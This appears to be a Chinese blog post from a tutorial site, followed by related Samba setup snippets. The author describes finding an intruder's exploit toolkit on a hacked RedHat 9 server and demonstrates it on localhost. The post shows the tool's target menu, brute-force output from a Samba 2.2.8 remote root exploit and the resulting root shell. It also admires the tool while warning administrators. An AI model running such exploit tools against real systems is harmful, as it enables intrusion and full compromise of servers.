默认Samba版本在RedHat 9上的溢出获取root演示

从近日对被黑服务器的安全分析来看,我找到该用户提升权限的工具。他是利用了Samba的安全漏洞提升为了ROOT。

这几天服务器因为要放到公网测试,此时又安装了Samba服务器。结果第二天就发现了服务器被黑

Samba是在Redhat Linux 9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。

提升为root,只需要短短的3秒钟

自己汗一个

从服务器的tmp查找到一个x2k3的目录

[bob@learnin9 tmp]$ cd x2k3/

[bob@learnin9 x2k3]$ ls

bind ftp gkr identd r00t samba

[bob@learnin9 x2k3]$

bind ftp gkr identd samba均为目录,r00t为一个程序,让我们来看看r00t程序的执行情况

[bob@learnin9 x2k3]$ ./r00t

.--------------------------------.

| x2k3 /

| Written by Natok /

+------------------------+----.

| Targets: [1] Samba | <= 2.2.8

| [2] Bind | 8.3.2 / 8.3.3 / 9.2.1

| [3] gkrellmd | <2.1.12

| [4] wu_ftpd | <=2.6.1

| [5] identd | 1.2

+------------------------+----.

| http://www.natok.de /

|____________________________/

./r00t

[bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1

[*] Range to scan : 127.0.0.0

[*] Socket Connecting to port : 139

[*] Press control+c for skipping !

Port 139 IP 127.0.0.0 -> Connection refused!

Port 139 IP 127.0.0.1 -> Connection ok!

[+] Let's sploit ;-)

samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)

--------------------------------------------------------------

+ Verbose mode.

+ Bruteforce mode. (Linux)

+ Host is running samba.

+ Using ret: [0xbffffed4]

+ Using ret: [0xbffffda8]

+ Using ret: [0xbffffc7c]

+ Using ret: [0xbffffb50]

+ Using ret: [0xbffffa24]

+ Using ret: [0xbffff8f8]

+ Using ret: [0xbffff7cc]

+ Using ret: [0xbffff6a0]

+ Using ret: [0xbffff574]

+ Using ret: [0xbffff448]

+ Using ret: [0xbffff31c]

+ Using ret: [0xbffff1f0]

+ Using ret: [0xbffff0c4]

+ Using ret: [0xbfffef98]

+ Using ret: [0xbfffee6c]

+ Using ret: [0xbfffed40]

+ Using ret: [0xbfffec14]

+ Using ret: [0xbfffeae8]

+ Using ret: [0xbfffe9bc]

+ Using ret: [0xbfffe890]

+ Using ret: [0xbfffe764]

+ Using ret: [0xbfffe638]

+ Using ret: [0xbfffe50c]

+ Using ret: [0xbfffe3e0]

+ Using ret: [0xbfffe2b4]

+ Using ret: [0xbfffe188]

+ Worked!

--------------------------------------------------------------

*** JE MOET JE MUIL HOUWE

Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux

uid=0(root) gid=0(root) groups=99(nobody)

id

uid=0(root) gid=0(root) groups=99(nobody)

看到了吧。就这么轻易的被夺取为root了。

我这只是localhost方式,其实远程也是一样的直接获取为root了。

请各位好好看看自己的Redhat 9吧。rpm -qa |grep ***** 是不是汗已经出来了?

还有bind gkrellmd wu_ftpd identd这些溢出程序。我不知道这些程序是否就是属于黑客界一些没有公布出来的溢出程序。呵呵!

我的服务器因为没有启动Bind、gkrellmd、wu_ftpd 、identd,只启动了默认安装的samba,而且还是在公网上,所以那个黑客就中奖入侵到我的服务器了。可喜可贺,我也是终于找到了这么好的工具。

自己欢喜一下。去看了一下http://www.natok.de/ 居然发现是中文的网站,究竟里面是谁?很好奇.........

可以说,r00t程序是Natok写的,但是exploit程序不是他写的,他只是将其它的溢出程序分门别类的。做了个友好的界面,不过能搜集到还是很强的。

希望能结识到这个家伙!

(0)

相关推荐

  • 在ubuntu中部署samba服务器的方法

    Samba服务在Ubuntu服务器版本中默认并没有安装.今天公司上了一批新电脑,准备把它装成服务器,于是为了方便开发的使用,我在上面部署了一个samba,用来实现window和linux的联系: 具体步骤,我详细的查看了百度,高手云集,以下就是总结了网友的经验,现在记下来,以后有用就不用到处找了. 一. samba的安装: sudo apt-get install samba sudo apt-get install smbfs 二. 创建共享目录: mkdir /home/phinecos/s

  • samba共享目录权限问题

    首先当然是要安装samba了,呵呵: 代码: sudo apt-get install samba sudo apt-get install smbfs 下面我们来共享群组可读写文件夹,假设你要共享的文件夹为: /home/ray/share 首先创建这个文件夹 代码: mkdir /home/ray/share chmod 777 /home/ray/share 备份并编辑smb.conf允许网络用户访问 代码: sudo cp /etc/samba/smb.conf /etc/samba/s

  • PHP和Shell实现检查SAMBA与NFS Server是否存在

    通常会通过 /etc/fstab 来处理挂载的设置,然后再使用 mount -a 来重新确认挂载,最好在排程的程序用到挂载目录时也执行一次 mount -a,挂载目录在断线后是不会自动回复的,mount -a 的 Timeout 其实还蛮久的,尤其是 Server 不存在的时候,所以最好还是用对应的 client 先确认 server 是否存在. 而检查 NFS 的 client 可以用 showmount 来处理,在 Ubuntu 上的安装方式如下: 复制代码 代码如下: sudo aptit

  • Samba NT Domain Controller

    Currently, Samba can go beyond merely emulating Windows shares to actually acting as the Primary Domain Controller for your Windows network. Of course, Samba can also become a NT domain member. In this article we shall look at both these options. The

  • Linux加入windows ad域步骤详解(winbindsamba方案)

    linux加入域中,一般都会想到加入LDAP中,这样管理起来方便,不过在linux下LDAP配置起来可不是很容易的,在企业办公环境中一般windows AD域占据霸主地位,配置方便嘛,针对生产环境的linux集群机器才会选择LDAP,不过有时候在办公环境中也混杂了linux机器,为了规范管理,也是需要把linux机器加入window是 AD中的. linux加入windows AD中方便操作的有两种方案(分为centos/ubuntu两种情况).都说了是方便操作,那必然是懒人的首选方法了. 1

  • RHE5服务器配置-搭建Samba服务器步骤(图)

    认识Samba   Samba的核心是两个守护进程,即smbd和nmbd.服务器启动到停止期间持续运行,smba监听139TCP端口:nmbd监听137和138UDP端口.smbd和nmbd使用的全部配置信息保存在smb.conf文件中,smb.conf向smbd和nmbd两个守护进程说明输出什么,共享输出给谁及如何输出以便共享.smbd进程的作用是处理到来的SMB数据包,为使用该数据包的资源与Linux协商:nmbd进程使其他主机(或工作站)能浏览Linux服务器. 一.安装配置Samba的R

  • 默认Samba版本在RedHat 9上的溢出获取root演示

    从近日对被黑服务器的安全分析来看,我找到该用户提升权限的工具.他是利用了Samba的安全漏洞提升为了ROOT. 这几天服务器因为要放到公网测试,此时又安装了Samba服务器.结果第二天就发现了服务器被黑 Samba是在Redhat Linux 9上默认的版本.使用了该黑客的强大的exploit工具提升为了root. 提升为root,只需要短短的3秒钟 自己汗一个 从服务器的tmp查找到一个x2k3的目录 [bob@learnin9 tmp]$ cd x2k3/ [bob@learnin9 x2k

  • Python在centos7.6上安装python3.9的详细教程(默认python版本为2.7.5)

    # 查看下centos7.6上的python版本 [root@registry ~]# cat /etc/redhat-release Linux release 7.6.1810 (Core) [root@registry ~]# python --version Python 2.7.5 为什么要升级呢?因为要部署一些软件,需要python3的支持!!!不得不装啊!!! 部署python3.9,并进入到python3虚拟环境: python3.9.0下载地址:https://www.pyth

  • 解决linux的redhat版上mysql字符乱码的问题

    linux上安装了mysql服务,默认的字符编码不是utf8,所以会出现中文乱码. 解决方案如下: 1.修改文件/etc/my.cnf,在mysqld配置的最后一行加上character-set-server=utf8 vi /etc/my.cnf 2.重启mysqld服务 service mysqld restart 3.字符中文乱码解决好了 以上这篇解决linux的redhat版上mysql字符乱码的问题就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持我们.

  • PHP5.0~5.6 各版本兼容性cURL文件上传功能实例分析

    本文实例分析了PHP5.0~5.6 各版本兼容性cURL文件上传功能.分享给大家供大家参考,具体如下: 最近做的一个需求,要通过PHP调用cURL,以multipart/form-data格式上传文件.踩坑若干,够一篇文章了. 重要警告 没事不要读PHP的官方中文文档!版本跟不上坑死你! 不同版本PHP之间cURL的区别 PHP的cURL支持通过给CURL_POSTFIELDS传递关联数组(而不是字符串)来生成multipart/form-data的POST请求. 传统上,PHP的cURL支持通

  • 更改Ubuntu默认python版本的两种方法python-> Anaconda

    你可以按照以下方法使用 ls 命令来查看你的系统中都有那些 Python 的二进制文件可供使用. $ ls /usr/bin/python* /usr/bin/python /usr/bin/python2 /usr/bin/python2.7 /usr/bin/python3 /usr/bin/python3.4 /usr/bin/python3.4m /usr/bin/python3m 执行如下命令查看默认的 Python 版本信息: $ python --version Python 2.

  • Java修改maven的默认jdk版本为1.7的方法

    问题: 1.创建maven项目的时候,jdk版本是1.5版本,而自己安装的是1.7或者1.8版本. 2.每次右键项目名-maven->update project 时候,项目jdk版本变了,变回1.5版本或者其他版本 解决办法: 解决办法一:在项目中的pom.xml指定jdk版本,如下: <build> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <ar

  • axios实现文件上传并获取进度

    本文实例为大家分享了axios实现文件上传并获取进度的具体代码,供大家参考,具体内容如下 实现效果 代码部分 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Document</title> </head> <body> <div id="app">

  • Egg.js 中 AJax 上传文件获取参数的方法

    依赖 formidable 代码 前端 <fieldset style="margin: 20px; padding: 20px;"> <legend>单文件,Ajax</legend> <form id="form3"> <div> <input type="text" id="customName" placeholder="自定义文件名"

  • 浅谈用Webpack路径压缩图片上传尺寸获取的问题

    问题的起因是因为的我的图片大小大于url-loader 的尺寸标准,导致webpack自动将图片的路径做了压缩处理,直接导致了我在获取dom的value的时候无法正确的获取到图片的正确路径. 直接上解决的方法. picUpload(e) { let image = new Image(); const reader = new FileReader(); const $img = e.target.files[0]; const formData = new FormData(); formDa

  • 详解Vue-cli3 项目在安卓低版本系统和IE上白屏问题解决

    最近遇到一个问题,用 Vue 开发的项目在最近两年新出的安卓手机上没问题,在三四年前的旧手机上出现白屏问题.分析一下应该是安卓系统版本的原因,目前已知的是Android 6.0 以上都 OK,6.0 以下就不行了. 低版本安卓系统内置的 webview 不支持 ES6 语法等一些新特性,所以报错.但在手机上调试不方便,受一篇文章的启发, IE 浏览器也是同样的问题,所以可以在 IE 上调试,一个调好了两个就都好了.突然发现万恶的 IE 还是有点用的- 网上的文章大部分是 Vue-cli 2.x

随机推荐